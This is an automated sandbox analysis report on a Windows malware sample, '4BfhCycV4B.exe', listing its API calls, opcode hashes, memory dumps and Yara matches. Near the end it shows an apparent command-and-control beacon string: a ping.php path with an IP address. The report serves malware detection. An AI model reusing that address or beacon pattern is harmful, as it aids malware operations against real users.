                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2421423613.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 313313983-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 2ab1cb42388bea207d069ccf979aa5779a8c9a7d5d58f401a09ee4fbb91ad362
                                                                                                                                                                                                                                                                                        • Instruction ID: e6e93543b041c594e81487d5909f541e573430f1ea5015fd54542e6688d1641d
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2ab1cb42388bea207d069ccf979aa5779a8c9a7d5d58f401a09ee4fbb91ad362
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E931AC32A0021AABDB249F65DC41DEF7BA5EF40318F04412AFC04D6291EB39CD95CB94
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetEnvironmentStringsW.KERNEL32 ref: 0041E53C
                                                                                                                                                                                                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0041E55F
                                                                                                                                                                                                                                                                                          • Part of subcall function 00417A45: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0041B4CD,00000000,?,00410DE7,?,00000008,?,00411992,?,?,?), ref: 00417A77
                                                                                                                                                                                                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0041E585
                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 0041E598
                                                                                                                                                                                                                                                                                        • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0041E5A7
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2421423613.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2421423613.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 336800556-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 161ddad54f16cc8f8ee3f9efc600df624e91a9148f9a42830057588c6c76ba95
                                                                                                                                                                                                                                                                                        • Instruction ID: da1d7805988d3e4f29d48d7d5147bf5fd0936ba562dc79f78d94e6ba61cfb34a
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 161ddad54f16cc8f8ee3f9efc600df624e91a9148f9a42830057588c6c76ba95
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4901D8766027207F23211AB75C48DFF6E6EDEC6B98355012EFD08D6200FE688D429178
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetEnvironmentStringsW.KERNEL32 ref: 0421E7A3
                                                                                                                                                                                                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0421E7C6
                                                                                                                                                                                                                                                                                          • Part of subcall function 04217CAC: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 04217CDE
                                                                                                                                                                                                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0421E7EC
                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 0421E7FF
                                                                                                                                                                                                                                                                                        • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0421E80E
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2429971918.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_4200000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 336800556-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 38dd7213b9bcb45c1147e39a21c5c15d2d7fc2ddc2b943de6988b854aed99f6c
                                                                                                                                                                                                                                                                                        • Instruction ID: 85883ce5fbef40d84fd973d1ce3d309e9e85d3c21b8fbd7e890d6afdf70ee667
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 38dd7213b9bcb45c1147e39a21c5c15d2d7fc2ddc2b943de6988b854aed99f6c
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3401B1727226217F333126AA5C8CC7F79ACDAE2AA43170169FD04D2120EE61AC02C1B5
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,?,?,00412386,004170A0,?,00416D47,00000001,00000364,?,0040E430,?,?,?,0040EB2D,?), ref: 00416DA2
                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00416DD7
                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00416DFE
                                                                                                                                                                                                                                                                                        • SetLastError.KERNEL32(00000000), ref: 00416E0B
                                                                                                                                                                                                                                                                                        • SetLastError.KERNEL32(00000000), ref: 00416E14
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2421423613.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2421423613.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: ErrorLast$_free
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 3170660625-0
                                                                                                                                                                                                                                                                                        • Opcode ID: e3e90bff77222727508dad1f2841c580120b19f71aaf83784f7f1a74d7e00c24
                                                                                                                                                                                                                                                                                        • Instruction ID: e46c26cc5ac3d344e97fba90109cbcfbfaa945fe7b6790f8bafc9466d81cae3c
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e3e90bff77222727508dad1f2841c580120b19f71aaf83784f7f1a74d7e00c24
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: CA01D6367447106A82217676BC85EEB2629DBC5764763027FF515A2282EF2CCC86515C
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,?,?,042125ED,04217307,?,04216FAE,00000001,00000364,?,0420E697,?,?,?,0420ED94,?), ref: 04217009
                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 0421703E
                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 04217065
                                                                                                                                                                                                                                                                                        • SetLastError.KERNEL32(00000000), ref: 04217072
                                                                                                                                                                                                                                                                                        • SetLastError.KERNEL32(00000000), ref: 0421707B
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2429971918.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_4200000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: ErrorLast$_free
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 3170660625-0
                                                                                                                                                                                                                                                                                        • Opcode ID: c553f296653e70e9d560cfb8a25ebfd7f1785a3d038cabbef75213465da2ef3c
                                                                                                                                                                                                                                                                                        • Instruction ID: 5b6495fe450919f085fff48d7845ebddf11563e6e3c24d34057f6b9a9d837d15
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c553f296653e70e9d560cfb8a25ebfd7f1785a3d038cabbef75213465da2ef3c
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8A01F9767707016B97322BF56C84F2F32D9EBF12A57210138F512A22B0FE70A8024164
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 0041EEB6
                                                                                                                                                                                                                                                                                          • Part of subcall function 0041629A: RtlFreeHeap.NTDLL(00000000,00000000,?,0041F151,?,00000000,?,00000000,?,0041F3F5,?,00000007,?,?,0041F7E9,?), ref: 004162B0
                                                                                                                                                                                                                                                                                          • Part of subcall function 0041629A: GetLastError.KERNEL32(?,?,0041F151,?,00000000,?,00000000,?,0041F3F5,?,00000007,?,?,0041F7E9,?,?), ref: 004162C2
                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 0041EEC8
                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 0041EEDA
                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 0041EEEC
                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 0041EEFE
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2421423613.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2421423613.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 776569668-0
                                                                                                                                                                                                                                                                                        • Opcode ID: fbee67670cac963d705fd7507e9235c6336ecf61fd3dc464c7e48e504d00ea45
                                                                                                                                                                                                                                                                                        • Instruction ID: 4b083a6e31e8a48a8b86c3cb0939e7a8061e9024a6891407e723d3d4127bfca1
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: fbee67670cac963d705fd7507e9235c6336ecf61fd3dc464c7e48e504d00ea45
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 09F04F32504310AB8A20EB6AF886E9773D9FA44764355480AFD08D7600CB38FCC0869C
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 0421F11D
                                                                                                                                                                                                                                                                                          • Part of subcall function 04216501: HeapFree.KERNEL32(00000000,00000000,?,0421F3B8,?,00000000,?,00000000,?,0421F65C,?,00000007,?,?,0421FA50,?), ref: 04216517
                                                                                                                                                                                                                                                                                          • Part of subcall function 04216501: GetLastError.KERNEL32(?,?,0421F3B8,?,00000000,?,00000000,?,0421F65C,?,00000007,?,?,0421FA50,?,?), ref: 04216529
                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 0421F12F
                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 0421F141
                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 0421F153
                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 0421F165
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2429971918.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_4200000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 776569668-0
                                                                                                                                                                                                                                                                                        • Opcode ID: d4ccbc2f617275c87f26a6c66d33927148d843e0dce03c06d1c0141f6de17669
                                                                                                                                                                                                                                                                                        • Instruction ID: 3e0e9be5de0c80a20643d23301bc0ee09cdf0a53b552be22f71de44c6334c85a
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d4ccbc2f617275c87f26a6c66d33927148d843e0dce03c06d1c0141f6de17669
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5EF09032730601BB9A30EBA8F9C5E1B73D9FA347A17650805F156D7530CB31F8818AA8
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 004152D0
                                                                                                                                                                                                                                                                                          • Part of subcall function 0041629A: RtlFreeHeap.NTDLL(00000000,00000000,?,0041F151,?,00000000,?,00000000,?,0041F3F5,?,00000007,?,?,0041F7E9,?), ref: 004162B0
                                                                                                                                                                                                                                                                                          • Part of subcall function 0041629A: GetLastError.KERNEL32(?,?,0041F151,?,00000000,?,00000000,?,0041F3F5,?,00000007,?,?,0041F7E9,?,?), ref: 004162C2
                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 004152E2
                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 004152F5
                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00415306
                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00415317
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2421423613.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2421423613.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 776569668-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 13296f953f5605bad7b8141934ae876b7b1474904382dc56f17c0a076f0bbd1e
                                                                                                                                                                                                                                                                                        • Instruction ID: 0846cff003075c5ec292790c94e0e8fa2dbc871af0b69e12aa43d6fe7fad35b7
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 13296f953f5605bad7b8141934ae876b7b1474904382dc56f17c0a076f0bbd1e
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D9F0DAB18017209BCA167F19FC816893B60FB5872872271BBF919A6275CB3959818FCD
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 04215537
                                                                                                                                                                                                                                                                                          • Part of subcall function 04216501: HeapFree.KERNEL32(00000000,00000000,?,0421F3B8,?,00000000,?,00000000,?,0421F65C,?,00000007,?,?,0421FA50,?), ref: 04216517
                                                                                                                                                                                                                                                                                          • Part of subcall function 04216501: GetLastError.KERNEL32(?,?,0421F3B8,?,00000000,?,00000000,?,0421F65C,?,00000007,?,?,0421FA50,?,?), ref: 04216529
                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 04215549
                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 0421555C
                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 0421556D
                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 0421557E
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2429971918.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_4200000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 776569668-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 355dd383c1edd0226fbc2c643ef7780839a72101d59efc5f040e21f59429e8dd
                                                                                                                                                                                                                                                                                        • Instruction ID: 0ed74fec90798dbdcb1ad6687674d8c9e993c045769da7afa7fb6aeba3bb8ba3
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 355dd383c1edd0226fbc2c643ef7780839a72101d59efc5f040e21f59429e8dd
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 39F089B1921110ABDB266F58FCC06093BE1FB24755311717AF509B2278DF3666818FCE
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2421423613.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2421423613.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                        • String ID: @
                                                                                                                                                                                                                                                                                        • API String ID: 0-2895899722
                                                                                                                                                                                                                                                                                        • Opcode ID: 0f9de87aa70dfc3766fc84c0c63344a5301fc3d38da3a9e682d4dd5edf44a18c
                                                                                                                                                                                                                                                                                        • Instruction ID: b548a9a7138a64da7a824066f4516bdc11857ebac08ae9c998b6d8d4508c541d
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0f9de87aa70dfc3766fc84c0c63344a5301fc3d38da3a9e682d4dd5edf44a18c
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: FF51C171D40209ABDB10AFA9C945FEF7BB8AF45314F12015BE804B7292D778D981CB69
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • _strpbrk.LIBCMT ref: 0041D8A0
                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 0041D9BD
                                                                                                                                                                                                                                                                                          • Part of subcall function 00410932: IsProcessorFeaturePresent.KERNEL32(00000017,00410904,00000016,00412B39,0000002C,00439740,0041D3CD,?,?,?,00410911,00000000,00000000,00000000,00000000,00000000), ref: 00410934
                                                                                                                                                                                                                                                                                          • Part of subcall function 00410932: GetCurrentProcess.KERNEL32(C0000417,00412B39,00000016,00416D9C), ref: 00410956
                                                                                                                                                                                                                                                                                          • Part of subcall function 00410932: TerminateProcess.KERNEL32(00000000), ref: 0041095D
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2421423613.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2421423613.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Process$CurrentFeaturePresentProcessorTerminate_free_strpbrk
                                                                                                                                                                                                                                                                                        • String ID: *?$.
                                                                                                                                                                                                                                                                                        • API String ID: 2812119850-3972193922
                                                                                                                                                                                                                                                                                        • Opcode ID: d9abd10b7aefc9144c270b2d223c4f4c04a3bd27397295da1f1220bb01056fb9
                                                                                                                                                                                                                                                                                        • Instruction ID: 8cfe7552e8cc1931d7ce14f3a793833fed444a164ef8b9e72ccff9a48bf79fb4
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d9abd10b7aefc9144c270b2d223c4f4c04a3bd27397295da1f1220bb01056fb9
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9251B3B1E00219AFDF14DFA9C881AEEBBB5EF48314F24416EE854E7341D6399E41CB54
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • _strpbrk.LIBCMT ref: 0421DB07
                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 0421DC24
                                                                                                                                                                                                                                                                                          • Part of subcall function 04210B99: IsProcessorFeaturePresent.KERNEL32(00000017,04210B6B,00000016,04212DA0,0000002C,00439740,0421D634,?,?,?,04210B78,00000000,00000000,00000000,00000000,00000000), ref: 04210B9B
                                                                                                                                                                                                                                                                                          • Part of subcall function 04210B99: GetCurrentProcess.KERNEL32(C0000417,04212DA0,00000016,04217003), ref: 04210BBD
                                                                                                                                                                                                                                                                                          • Part of subcall function 04210B99: TerminateProcess.KERNEL32(00000000), ref: 04210BC4
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2429971918.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_4200000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Process$CurrentFeaturePresentProcessorTerminate_free_strpbrk
                                                                                                                                                                                                                                                                                        • String ID: *?$.
                                                                                                                                                                                                                                                                                        • API String ID: 2812119850-3972193922
                                                                                                                                                                                                                                                                                        • Opcode ID: acc5e60d4f05009bbc3f2ccde68c96ea5ce2f15c3993d478fa3a97017db29cf6
                                                                                                                                                                                                                                                                                        • Instruction ID: dd3cd51d9b0e2ee9a8d30b1212e86d1304b79bb2aa9a5d13c7f31916ee292e96
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: acc5e60d4f05009bbc3f2ccde68c96ea5ce2f15c3993d478fa3a97017db29cf6
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8E517C71E2021AEFDB14DFA8C880AADB7F5EF58214F2441A9D855E7350E675BA018B50
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\4BfhCycV4B.exe,00000104), ref: 00413303
                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 004133CE
                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 004133D8
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2421423613.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2421423613.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: _free$FileModuleName
                                                                                                                                                                                                                                                                                        • String ID: C:\Users\user\Desktop\4BfhCycV4B.exe
                                                                                                                                                                                                                                                                                        • API String ID: 2506810119-2706877378
                                                                                                                                                                                                                                                                                        • Opcode ID: 89571fb4a0fa21399e53de1581e60ccbdefbfde7f591af085b1f054b64fc575c
                                                                                                                                                                                                                                                                                        • Instruction ID: ddf04b2862e1199f4fb1385bf4b9d3a7dff69665be34de18e7ab35541f588614
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 89571fb4a0fa21399e53de1581e60ccbdefbfde7f591af085b1f054b64fc575c
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: DD319571A00218AFDB219F5A9C819DEBBB8EB85315F1041ABFC14D7210DB749B81CB9C
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\4BfhCycV4B.exe,00000104), ref: 0421356A
                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 04213635
                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 0421363F
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2429971918.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_4200000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: _free$FileModuleName
                                                                                                                                                                                                                                                                                        • String ID: C:\Users\user\Desktop\4BfhCycV4B.exe
                                                                                                                                                                                                                                                                                        • API String ID: 2506810119-2706877378
                                                                                                                                                                                                                                                                                        • Opcode ID: d182b465e3df3df7efeaa8add202c801fb9aa30faacca89b2e795b20c07713d1
                                                                                                                                                                                                                                                                                        • Instruction ID: 19146988c89d1355b5af578d08549e920d934548d5ef2c2ad087858aa49024ce
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d182b465e3df3df7efeaa8add202c801fb9aa30faacca89b2e795b20c07713d1
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D2319971B10258FFEB21DF999C8099EBBFDEBA8754F104066F80597220D7706A41CB94
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2421423613.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2421423613.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: H_prolog
                                                                                                                                                                                                                                                                                        • String ID: /ping.php?substr=%s$185.172.128.228$Installed
                                                                                                                                                                                                                                                                                        • API String ID: 3519838083-3380671521
                                                                                                                                                                                                                                                                                        • Opcode ID: 921861a328e3f7d7c824c3837ef5087e2f64e12fe3abc36e80d027132d948a15
                                                                                                                                                                                                                                                                                        • Instruction ID: 895aa7ca95bfe32917cece0cc4021e99c0fa9e15b4dc78af84e68f763d0dcda6
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 921861a328e3f7d7c824c3837ef5087e2f64e12fe3abc36e80d027132d948a15
